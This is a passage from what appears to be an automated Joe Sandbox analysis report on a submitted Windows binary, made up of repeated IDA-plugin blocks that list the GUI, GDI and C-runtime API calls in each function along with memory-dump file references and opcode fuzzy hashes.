                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: InflateRect
                                                              • String ID:
                                                              • API String ID: 2073123975-0
                                                              • Opcode ID: 7c19a90be7e750ccf6879dfbd5c240f3e96609e751a6bd49f40642a32ce6375b
                                                              • Instruction ID: 70af7d7e2c6235a4a4c976069fdea0f857184eaae01f0bb2dd908c9f867777fb
                                                              • Opcode Fuzzy Hash: 7c19a90be7e750ccf6879dfbd5c240f3e96609e751a6bd49f40642a32ce6375b
                                                              • Instruction Fuzzy Hash: 9E316D7260021ABBDF01DF94DC89EFA3BADBB49724B140612F624D32D1DA74EA50CB60
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0051E10B
                                                                • Part of subcall function 004ECC18: GetWindowLongW.USER32(?,000000EC), ref: 004ECC23
                                                              • OffsetRect.USER32(?,?,00000000), ref: 0051E166
                                                              • UnionRect.USER32(?,?,?), ref: 0051E184
                                                              • EqualRect.USER32(?,?), ref: 0051E192
                                                              • UpdateWindow.USER32(?), ref: 0051E1CE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window$EqualLongOffsetUnionUpdate
                                                              • String ID:
                                                              • API String ID: 4261707372-0
                                                              • Opcode ID: 7958f8cc9b66785cdf54dfbf083ba73cfb587d1306effb9d6516498a6ec50413
                                                              • Instruction ID: 099b586e04269aab37c98417d20432c3f163c3dc92108cac6f6d2c06799654bf
                                                              • Opcode Fuzzy Hash: 7958f8cc9b66785cdf54dfbf083ba73cfb587d1306effb9d6516498a6ec50413
                                                              • Instruction Fuzzy Hash: E23128B1901209EFCB10DFA9C9859EEBBF9FB48314F104A2EE516E3250CB34AA45DB50
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 004DE503
                                                              • CreateRectRgnIndirect.GDI32(?), ref: 004DE525
                                                                • Part of subcall function 004E0090: SelectClipRgn.GDI32(?,00000000), ref: 004E00B6
                                                                • Part of subcall function 004E0090: SelectClipRgn.GDI32(?,?), ref: 004E00CC
                                                              • GetParent.USER32(?), ref: 004DE545
                                                              • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 004DE59D
                                                              • SendMessageW.USER32(?,00000014,?,00000000), ref: 004DE5CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClipSelect$CreateH_prolog3IndirectMessageParentPointsRectSendWindow
                                                              • String ID:
                                                              • API String ID: 3362736716-0
                                                              • Opcode ID: 6972407cd59fe04b4612d32ecec1820f2b8ea57cba4529e1c8d3b521a9382c36
                                                              • Instruction ID: f40a74c69b9c041acc512bdceeeaa58c1c75bd7a7cc48efea02d39b53f6cab59
                                                              • Opcode Fuzzy Hash: 6972407cd59fe04b4612d32ecec1820f2b8ea57cba4529e1c8d3b521a9382c36
                                                              • Instruction Fuzzy Hash: 32313C71A0021AAFCF14EFA5C854ABEBBB5FF48344F00452AF516AB350EB749E05DB94
                                                              APIs
                                                              • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 0050C5B0
                                                              • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 0050C5CC
                                                              • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 0050C60F
                                                                • Part of subcall function 0055C679: SendMessageW.USER32(?,00000433,00000000,?), ref: 0055C6AC
                                                              • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 0050C5FA
                                                              • SetRectEmpty.USER32(?), ref: 0050C62F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$EmptyRect
                                                              • String ID:
                                                              • API String ID: 4004678023-0
                                                              • Opcode ID: e6780f2eb97eb576f383071f694af687a8f48afea81646cb7dc8ad1c82560a3a
                                                              • Instruction ID: 3fab06adf897f854ed4fa630e4653d22abb22394b0b0bcd83d4f0b14195af0de
                                                              • Opcode Fuzzy Hash: e6780f2eb97eb576f383071f694af687a8f48afea81646cb7dc8ad1c82560a3a
                                                              • Instruction Fuzzy Hash: AD3100B19002099FDB14DBA8CC81EBFBFF9FB49340F11066DE65597250DA71A9418B90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$InflateInvalidateUpdate
                                                              • String ID:
                                                              • API String ID: 2730120201-0
                                                              • Opcode ID: 0e4a256d883960945dc1ec5f37965150ce9b3ed3b041c20a414cc6ecd8e0a35a
                                                              • Instruction ID: a2bede6bea418fdf457459d25d929ac23c6384cd01ea5d52c851d693e82dd2e9
                                                              • Opcode Fuzzy Hash: 0e4a256d883960945dc1ec5f37965150ce9b3ed3b041c20a414cc6ecd8e0a35a
                                                              • Instruction Fuzzy Hash: A731E4322002059BDB01EF65C988FEA7BB9FF88344F1540A5ED49DF2A6DB35E805CB60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window
                                                              • String ID:
                                                              • API String ID: 924285169-0
                                                              • Opcode ID: 43e0e0dd607900fb5950e088bdbcd23ce95db9641fcb25962d12f3916ae15f25
                                                              • Instruction ID: f39726bd7d0738a9343b8bd51428469cf5f4f1a438cba58e700025ddea94ef97
                                                              • Opcode Fuzzy Hash: 43e0e0dd607900fb5950e088bdbcd23ce95db9641fcb25962d12f3916ae15f25
                                                              • Instruction Fuzzy Hash: 983107B9A10229EFCB10DFA9D8849EEBBF9FF4D710B10406AE405E3261D7759940CFA1
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 004E86B6
                                                              • GetWindowRect.USER32(00000000,?), ref: 004E86E3
                                                              • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 004E8708
                                                              • GetWindow.USER32(?,00000005), ref: 004E8711
                                                              • ScrollWindow.USER32(?,?,?,?,?), ref: 004E872C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$RectScrollVisible
                                                              • String ID:
                                                              • API String ID: 2639402888-0
                                                              • Opcode ID: b2dd85b0b5c684c4c6f5a706977bb6d443f2345b510138ddda8a1d51174353f4
                                                              • Instruction ID: 848020f2e2d2f3d9e3fe32d0f548ae04013ca8e836608cb092561f2715cad48b
                                                              • Opcode Fuzzy Hash: b2dd85b0b5c684c4c6f5a706977bb6d443f2345b510138ddda8a1d51174353f4
                                                              • Instruction Fuzzy Hash: 02215771900208AFCF11DFA6CC89DAFBBB9FF98301B20440AF64AA6211DB359940DB61
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 004EA6EE
                                                              • GetTopWindow.USER32(00000000), ref: 004EA713
                                                              • GetDlgCtrlID.USER32(00000000), ref: 004EA725
                                                              • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 004EA781
                                                              • GetWindow.USER32(00000000,00000002), ref: 004EA7C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$CtrlH_prolog3MessageSend
                                                              • String ID:
                                                              • API String ID: 849854284-0
                                                              • Opcode ID: a6bc674ac37077711147b150ab2e3af54e03751d014c8ed25033df643d50a27c
                                                              • Instruction ID: deb03ab68f2389c2edbc080b40afaff2a33c342c8216c30c43e65d28eec55afc
                                                              • Opcode Fuzzy Hash: a6bc674ac37077711147b150ab2e3af54e03751d014c8ed25033df643d50a27c
                                                              • Instruction Fuzzy Hash: 6D21D071901254AADF24EBA2CC85EBEBA75FF55301F20415BF451E2290DB38AE44CB6A
                                                              APIs
                                                              • SetupGetStringFieldW.SETUPAPI(?,00000001,00000000,00000000,00000000), ref: 004D2A54
                                                              • GetLastError.KERNEL32(?,?,004D2172,?), ref: 004D2A5E
                                                              • SetupGetStringFieldW.SETUPAPI(?,00000001,?,00000000,00000000), ref: 004D2AA4
                                                              • _wcsnlen.LIBCMT ref: 004D2ACB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: FieldSetupString$ErrorLast_wcsnlen
                                                              • String ID:
                                                              • API String ID: 2547521842-0
                                                              • Opcode ID: 1f3a6367943c173c4630aba13c35eda614c08dcb90d90e35d205d6da0246986c
                                                              • Instruction ID: 3b56be69f0888489ad1ca41f93d061d84c6077162b2d3e462222b586172c7672
                                                              • Opcode Fuzzy Hash: 1f3a6367943c173c4630aba13c35eda614c08dcb90d90e35d205d6da0246986c
                                                              • Instruction Fuzzy Hash: 88215B71700105AFDB24CFA9DD98E3AB7E9EFA8345F10016EE509C7350EA75AD41CA68
                                                              APIs
                                                                • Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09
                                                              • SendMessageW.USER32(?,00000086,00000001,00000000), ref: 00516DF8
                                                              • SendMessageW.USER32(?,00000086,00000000,00000000), ref: 00516E0F
                                                              • GetDesktopWindow.USER32 ref: 00516E13
                                                              • SendMessageW.USER32(00000000,0000036D,0000000C,00000000), ref: 00516E34
                                                              • GetWindow.USER32(00000000), ref: 00516E39
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$DesktopLong
                                                              • String ID:
                                                              • API String ID: 2272707703-0
                                                              • Opcode ID: b9b4da6a1f68a12d89a6eda850993984b6f7296db949c1ef7e801dc6b703759f
                                                              • Instruction ID: c883d9b82c44cce9aee7c7f6d52670c65cbba81b5cbb42eedd16032cee870ff3
                                                              • Opcode Fuzzy Hash: b9b4da6a1f68a12d89a6eda850993984b6f7296db949c1ef7e801dc6b703759f
                                                              • Instruction Fuzzy Hash: FA11EF3534175167FB312B22CC86FEB3E58FF84BA4F240229FA01991E1CEA6D8819694
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00521456
                                                              • DestroyMenu.USER32(?,00000004,005218A4), ref: 00521492
                                                              • IsWindow.USER32(?), ref: 005214A3
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 005214B7
                                                              • ~_Task_impl.LIBCPMT ref: 00521530
                                                                • Part of subcall function 0057B6DD: GetParent.USER32(?), ref: 0057B743
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: DestroyH_prolog3MenuMessageParentSendTask_implWindow
                                                              • String ID:
                                                              • API String ID: 1857064102-0
                                                              • Opcode ID: a5f83fa2ab1a4ab034e163c7c47e934e230c1f1e9ec7154578d3fa9e6c5f47fa
                                                              • Instruction ID: cc37d19bea6a9a11307c55826d3df64e53bc3da7b6ce62c91cd78c749c84b3d4
                                                              • Opcode Fuzzy Hash: a5f83fa2ab1a4ab034e163c7c47e934e230c1f1e9ec7154578d3fa9e6c5f47fa
                                                              • Instruction Fuzzy Hash: 0031D430501A45CFDB21EF74C559BBEBFE0BF96304F20445DE09A57281DBB92A45EB12
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ParentRect$ClientFillPointsWindow
                                                              • String ID:
                                                              • API String ID: 3058756167-0
                                                              • Opcode ID: d10a40c1d700eb5b7c65898b8ec19276b91de1f44ec8dc29493e81a6b034cbf8
                                                              • Instruction ID: 29f6327532a66b959af75cf084170a5e16f97aefdeb874d853aa77bdb93640b4
                                                              • Opcode Fuzzy Hash: d10a40c1d700eb5b7c65898b8ec19276b91de1f44ec8dc29493e81a6b034cbf8
                                                              • Instruction Fuzzy Hash: 8A212771900209AFCF00EFA5CC498BFBBB5FF49310B51456EE905A7261EB75AA05DB90
                                                              APIs
                                                              • GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 00517615
                                                              • GlobalAddAtomW.KERNEL32(?), ref: 00517624
                                                              • GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 0051763A
                                                              • GlobalAddAtomW.KERNEL32(?), ref: 00517643
                                                              • SendMessageW.USER32(?,000003E4,?,?), ref: 0051766D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AtomGlobal$Name$MessageSend
                                                              • String ID:
                                                              • API String ID: 1515195355-0
                                                              • Opcode ID: a19743e76693e154ee7f783a07e4b0e94d1d6ace6bdef56400296cc6c2b3abc6
                                                              • Instruction ID: b70d3d9723b369871d66a6f6a13550f1b5dd3eeee67fb695b7979a175916f317
                                                              • Opcode Fuzzy Hash: a19743e76693e154ee7f783a07e4b0e94d1d6ace6bdef56400296cc6c2b3abc6
                                                              • Instruction Fuzzy Hash: 81218E7190021CAADB20EF79CC48AEAB7F8FB18744F10859AE55DD7191D778AE84CB60
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005B4C86
                                                              • SetRectEmpty.USER32(?), ref: 005B4D3B
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 005B4D3E
                                                              • SetRectEmpty.USER32(?), ref: 005B4D5D
                                                              • CreatePen.GDI32(00000000,00000001,?), ref: 005B4D68
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CreateEmptyH_prolog3Rect$CompatibleException@8Throw
                                                              • String ID:
                                                              • API String ID: 2318760352-0
                                                              • Opcode ID: d40786d58036efc0d54b5a077e18c3c465ac4829b311ba487a0c8772e543c47f
                                                              • Instruction ID: 285a2e3ee7a85fde57ab01ef8f24d395a7055312257e6ee1488be4d85b0817ef
                                                              • Opcode Fuzzy Hash: d40786d58036efc0d54b5a077e18c3c465ac4829b311ba487a0c8772e543c47f
                                                              • Instruction Fuzzy Hash: CF21C8B0801B44CFD761DF6AC981BAAFAE8BFA4300F10891FE1AE97211CBB46545DF55
                                                              APIs
                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004D71B2
                                                                • Part of subcall function 005E8838: _setlocale.LIBCMT ref: 005E884A
                                                              • _free.LIBCMT ref: 004D71C4
                                                                • Part of subcall function 005CE216: HeapFree.KERNEL32(00000000,00000000,?,005D5DB2,00000000,?,005D4298,?,00000001,?,?,005D6FC6,00000018,00638280,0000000C,005D7056), ref: 005CE22C
                                                                • Part of subcall function 005CE216: GetLastError.KERNEL32(00000000,?,005D5DB2,00000000,?,005D4298,?,00000001,?,?,005D6FC6,00000018,00638280,0000000C,005D7056,?), ref: 005CE23E
                                                              • _free.LIBCMT ref: 004D71D7
                                                              • _free.LIBCMT ref: 004D71EA
                                                              • _free.LIBCMT ref: 004D71FD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                              • String ID:
                                                              • API String ID: 3515823920-0
                                                              • Opcode ID: 8debc0d10902745988ad6fa00da3df8896c47a7a6caa6427cb03906d43589fa9
                                                              • Instruction ID: ba3fcb0e7cbb7da1f0643957f66ad17085fea0eb82c43366531a58c2549af04e
